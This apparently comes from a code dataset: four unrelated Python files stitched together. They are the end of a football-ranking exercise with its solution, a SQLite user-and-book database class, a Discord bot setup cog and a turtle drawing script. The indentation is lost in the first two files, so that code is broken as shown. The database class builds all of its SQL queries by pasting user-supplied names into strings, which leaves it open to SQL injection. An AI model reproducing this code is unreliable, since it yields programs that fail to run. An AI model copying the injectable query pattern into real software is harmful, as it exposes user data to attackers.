goal differences of the two teams, your task
is to determine which of the two is ranked
higher, or whether they are tied in the
championship.
Write a program that solves this problem.
INPUT:
The input is Cv, Ce, Cs, Fv, Fe, Fs, which are,
respectively, the number of wins of Cormengo,
the number of draws of Cormengo, the goal
difference of Cormengo, the number of wins of
Flaminthians, the number of draws of Flaminthians
and the goal difference of Flaminthians. Read
them in this order, one value at a time.
OUTPUT:
Your program must print a single line.
If Cormengo is ranked higher than Flaminthians,
the line must contain only the letter 'C'
(without quotes); if Flaminthians is ranked
higher than Cormengo, the line must contain
only the letter 'F' (without quotes); and if
the two teams are tied, the line must contain
only the character '=' (without quotes).
Examples:
For the input:
10
5
18
11
1
18
The output must be:
C
For the input:
10
5
18
11
2
18
The output must be:
= '''
# -*- coding: utf-8 -*-
import math
Cvitorias = int(input())
Cempates = int(input())
Csaldo = int(input())
Fvitorias = int(input())
Fempates = int(input())
Fsaldo = int(input())
Cvitorias*=3
Fvitorias*=3
if (Cvitorias+Cempates) > (Fvitorias+Fempates):
print('C')
if(Cvitorias+Cempates) < (Fvitorias+Fempates):
print('F')
if(Cvitorias+Cempates) == (Fvitorias+Fempates):
if Csaldo > Fsaldo:
print('C')
elif Csaldo < Fsaldo:
print('F')
elif ((Cvitorias+Cempates) == (Fvitorias+Fempates) and Csaldo == Fsaldo):
print('=')
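# --- Added illustration (not part of the original solution): the same ranking
# rule expressed as a reusable function via tuple comparison, which orders by
# points first and goal difference second.
def classify(cv, ce, cs, fv, fe, fs):
    c_key = (3 * cv + ce, cs)
    f_key = (3 * fv + fe, fs)
    if c_key > f_key:
        return 'C'
    if c_key < f_key:
        return 'F'
    return '='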
| python |
"""
Класс данных БД
"""
import sqlite3
import os
class DbLib:
def __init__(self,namefile):
if not os.path.exists(namefile):
self.conn = sqlite3.connect(namefile, check_same_thread=False)
self.c = self.conn.cursor()
# Create table
self.c.execute('''CREATE TABLE users
(id integer, nameuser text, role text)''')
self.c.execute('''CREATE TABLE books
(id integer, idbook integer, author text, namebook text, pathbook text, currentpage integer, description text, active integer)''')
else:
self.conn = sqlite3.connect(namefile, check_same_thread=False)
self.c = self.conn.cursor()
    # Methods for working with the users table
def add_user(self,nameuser,role):
"""
добавляем пользователя, проверяем есть ли данный пользователь в таблице Users
"""
if self.is_user(nameuser):
return False
self.c.execute("SELECT MAX(id) FROM users")
        # Fetch the query result
id = self.c.fetchall()
#print(id[0][0])
if id[0][0] is None:
id = 1
else:
id = int(id[0][0]) +1
#print(id)
str = "INSERT INTO users (id, nameuser, role) VALUES ({0},'{1}','{2}')".format(id,nameuser,role)
#print(str)
self.c.execute(str)
self.conn.commit()
return True
def del_user(self,nameuser):
"""
удаление информации по пользователю из таблицы users
"""
command = "DELETE FROM users WHERE nameuser = '{0}'".format(nameuser)
self.c.execute(command)
self.conn.commit()
return True
def edit_user_role(self,nameuser,role):
"""
редактирование роли у пользователя nameuser
"""
command = "UPDATE users SET role='{0}' WHERE nameuser='{1}'".format(role,nameuser)
self.c.execute(command)
self.conn.commit()
return True
def is_user(self,nameuser):
"""
возвращает True - если пользователь существует
"""
self.c.execute("SELECT nameuser FROM users WHERE nameuser='{}'".format(nameuser))
user = self.c.fetchall()
#print(user)
if user == []:
return False
else:
return True
def get_id_user(self,nameuser):
"""
получение id пользователя по имени, если пользователя нет, то возвращается None
"""
if not self.is_user(nameuser):
return None
self.c.execute("SELECT id FROM users WHERE nameuser='{0}'".format(nameuser))
        # Fetch the query result
id = self.c.fetchall()
print(id[0][0])
if id[0][0] is None:
return None
else:
id = int(id[0][0])
return id
def get_all_username(self):
"""
возвращает всех пользователей из таблицы Users, возвращает название и автор книги
"""
result=[]
self.c.execute("SELECT nameuser FROM users")
users = self.c.fetchall()
#print(users)
for user in users:
if user[0] is not None:
result.append(user[0])
return result
    # END of methods for the users table
    # Methods for working with the books table
def set_active_book(self, idbook):
"""
устанавливаем статус активности (идет процесс чтения)
"""
command = "UPDATE books SET active='1' WHERE idbook={0}".format(idbook)
print(command)
self.c.execute(command)
self.conn.commit()
return True
def set_noactive_book(self, idbook):
"""
убираем статус активности (идет процесс чтения)
"""
command = "UPDATE books SET active='0' WHERE idbook={0}".format(idbook)
print(command)
self.c.execute(command)
self.conn.commit()
return True
    def set_noactive_books_for_user(self, nameuser):
        """
        Clear the active (currently being read) status on all books of user nameuser.
        """
        id_user = self.get_id_user(nameuser)
        if id_user is None:
            return False
        command = "UPDATE books SET active='0' WHERE id={0}".format(id_user)
        #print(command)
        self.c.execute(command)
        self.conn.commit()
        return True
def get_currentpage_in_active_book(self, nameuser):
"""
получение номера страницы текущей книги у пользователя nameuser
"""
current_page = None
id_user = self.get_id_user(nameuser)
if id_user is None:
return current_page
command = "SELECT currentpage FROM books WHERE (id={0}) AND (active=1)".format(id_user)
self.c.execute(command)
        current_page = self.c.fetchone()
        if current_page is None:
            return None
        return current_page[0]
def get_path_active_book(self, nameuser):
"""
получаем путь где находится текущая книга пользователя nameuser
"""
id_user = self.get_id_user(nameuser)
if id_user is None:
return None
command = "SELECT pathbook FROM books WHERE (id={0}) AND (active=1)".format(id_user)
self.c.execute(command)
        path_book = self.c.fetchone()
        if path_book is None:
            return None
        return path_book[0]
def set_currentpage_in_active_book(self, nameuser, current_page=0):
"""
устанавливаем номер страницы current_page у пользователя nameuser активной книги
"""
id_user = self.get_id_user(nameuser)
if id_user is None:
return
command = "UPDATE books SET currentpage={0} WHERE (id={1}) AND (active=1)".format(current_page, id_user)
self.c.execute(command)
self.conn.commit()
return
def get_all_book(self, nameuser):
"""
получение списка книг пользователя nameuser
"""
result =[]
id_user = self.get_id_user(nameuser)
if id_user is None:
return result
str_command = "SELECT idbook, namebook, author FROM books WHERE id={0}".format(id_user)
self.c.execute(str_command)
result = self.c.fetchall()
return result
def add_book(self,nameuser,book):
"""
добавляем книгу пользователю nameuser.
book - это словарь с ключами namebook(название книги) , pathbook(путь до книги на диске) ,currentpage (текущая страница), author - автор книги
"""
self.c.execute("SELECT MAX(idbook) FROM books")
        # Fetch the query result
idbook = self.c.fetchall()
#print(id[0][0])
if idbook[0][0] is None:
idbook = 1
else:
idbook = int(idbook[0][0])+1
id = self.get_id_user(nameuser)
if id is None:
return False
str = "INSERT INTO books (id, author, namebook, pathbook, currentpage, description, idbook, active) VALUES ({0},'{1}','{2}','{3}',{4},'{5}',{6},'{7}')".format(id,book["author"],book["book"],book["pathbook"],book["currentpage"],book["description"],idbook,0)
print(str)
self.c.execute(str)
self.conn.commit()
return True
def is_namebook(self,namebook):
"""
возвращает True - если название книги существует
"""
self.c.execute("SELECT namebook FROM books WHERE namebook='{}'".format(namebook))
user = self.c.fetchall()
if user == []:
return False
else:
return True
def del_book(self,namebook,author):
pass
def edit_book(self,book):
"""
book - это словарь с ключами namebook(название книги) , pathbook(путь до книги на диске) ,currentpage (текущая страница), author - автор книги
"""
pass
    # END of methods for the books table
def closedb(self):
self.conn.close()
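# --- Hypothetical usage sketch (an addition, not part of the original module);
# the file name and sample data are made up. Note that add_book() reads the
# title from the 'book' key of the dict.
if __name__ == '__main__':
    db = DbLib('library.db')
    db.add_user('alice', 'reader')
    db.add_book('alice', {
        'author': 'A. Author',
        'book': 'Some Title',
        'pathbook': '/books/some_title.fb2',
        'currentpage': 0,
        'description': 'demo entry',
    })
    for idbook, namebook, author in db.get_all_book('alice'):
        print(idbook, namebook, author)
    db.closedb()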
| python |
from discord.ext import commands as cmd
import os
import util.Modular as mod
class Setup(cmd.Cog):
def __init__(self, panda):
self.panda = panda
@cmd.Cog.listener()
async def on_ready(self):
        print('Successfully initialized Panda™' + '\n' * 5)
@cmd.command(help='Basic information on how to get started with Panda™')
async def setup(self, bot):
if not os.path.exists(f'servers/{bot.guild.name}/settings.txt'):
if bot.channel.name == 'console':
#generate folders for current server
directory = ['servers', f'servers/{bot.guild.name}', f'servers/{bot.guild.name}/ccdir', f'servers/{bot.guild.name}/ccogs']
for folder in directory:
if not os.path.exists(folder):
os.mkdir(folder)
#display bio
await bot.channel.send(f'Hello {bot.author.mention}, I\'m {self.panda.user.mention} !\nIn short, I am a programmer\'s ideal partner!\nI was designed to create `man-db` integration and instant `macro/script creation` into a Discord server to allow for faster software development\nPlease run `;su <character>` to assign a custom command character and finish setup')
else:
await bot.channel.send(f'{bot.author.mention}, please use a `#console` text channel to interact with this feature.')
else:
await bot.channel.send(f'Sorry {bot.author.mention}, the setup has already been completed. Please run `;reset` then run `;setup` to run the setup again or notify an administrator.')
@cmd.command(help='Define this server\'s prefix for custom commands')
async def su(self, bot, prefix):
if not os.path.exists(f'servers/{bot.guild.name}/settings.txt'):
if len(prefix)==1:
with open(f'servers/{bot.guild.name}/settings.txt', 'w') as file:
file.write(prefix + '\n')
await bot.channel.send(f'Thank you {bot.author.mention}, the first time setup is now complete. Please use `;new <name> <code>` and `;rmv <name>` to create and delete commands.\nYou can also use `;run <code>` or simply DM me to use my integrated **Python Interpreter**!')
else:
await bot.channel.send(f'Invalid input {bot.author.mention}! Please re-run `;su <character>` to assign a custom command character and finish setup')
else:
await bot.channel.send(f'Sorry {bot.author.mention}, the setup has already been completed. Please run `;reset` and then `;setup` to run the setup again or notify an administrator.')
def setup(panda):
panda.add_cog(Setup(panda))
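# --- Hedged start-up sketch (an addition, not part of the original cog): the
# module path, prefix and token are assumptions. On discord.py 2.x, Bot() also
# needs an 'intents' argument and load_extension() must be awaited.
if __name__ == '__main__':
    panda = cmd.Bot(command_prefix=';')
    panda.load_extension('cogs.setup')   # assumed module path; runs setup(panda) above
    panda.run('YOUR_BOT_TOKEN')          # placeholder token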
| python |
import time
# You can edit this code and run it right here in the browser!
# First we'll import some turtles and shapes:
import turtle
from turtle import *
from shapes import *
# Creating a window
window = turtle.Screen()
window.setup(400, 400)
# Create a turtle named Tommy:
tommy = Turtle()
tommy.shape("turtle")
tommy.speed(0)
# sun
draw_star(tommy, "orange", 50, -150, 140)
draw_circle(tommy, "yellow", 40, -167, 126)
# grass
draw_square(tommy, "green", 300, -200, -750)
for x in range(-240, 80, 10):
    draw_triangle(tommy, 'green', 10, x, -158)
# tree
draw_square(tommy, "brown", 300, 100, -168)
draw_circle(tommy, "green", 20, 100, 180)
draw_circle(tommy, "green", 30, 150, 120)
draw_circle(tommy, "green", 23, 125, 140)
# head ;)
draw_circle(tommy, 'black', 20, -2, -10)
draw_circle(tommy, 'white', 3, -7, 10)
draw_circle(tommy, 'white', 3, 5, 10)
# torso
for y in range(-10, -70, -5):
    draw_square(tommy, 'black', 3, -5, y)
# arm
for x in range(-10, -50, -5):
    draw_square(tommy, 'black', 3, x, -30)
# other arm lmao
for x in range(0, 40, 5):
    draw_square(tommy, 'black', 3, x, -30)
# Spin the turtle in place by cycling through its tilt angles
tommy.penup()
tommy.goto(0, 150)
tommy.speed(3)
for _ in range(7):
    for angle in range(20, 361, 20):
        tommy.settiltangle(angle)
# Write a little message:
tommy.penup()
tommy.goto(0, 100)
tommy.color("black")
tommy.write("XXXXXXXX lmao", None, "center", "16pt 20")
tommy.goto(0, -80)
# Try changing draw_circle to draw_square, draw_triangle, or draw_star
# The turtle program is finished
turtle.done()
# Don't close the GUI for 10 seconds
time.sleep(10)
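# --- Hypothetical sketch (an addition, not part of the original script): the
# 'shapes' module used above is not shown; two of its helpers could plausibly
# look like this, matching the call signature (turtle, color, size, x, y).
def draw_circle(t, color, radius, x, y):
    t.penup()
    t.goto(x, y)
    t.pendown()
    t.color(color)
    t.begin_fill()
    t.circle(radius)
    t.end_fill()

def draw_square(t, color, side, x, y):
    t.penup()
    t.goto(x, y)
    t.pendown()
    t.color(color)
    t.begin_fill()
    for _ in range(4):
        t.forward(side)
        t.left(90)
    t.end_fill()
| python |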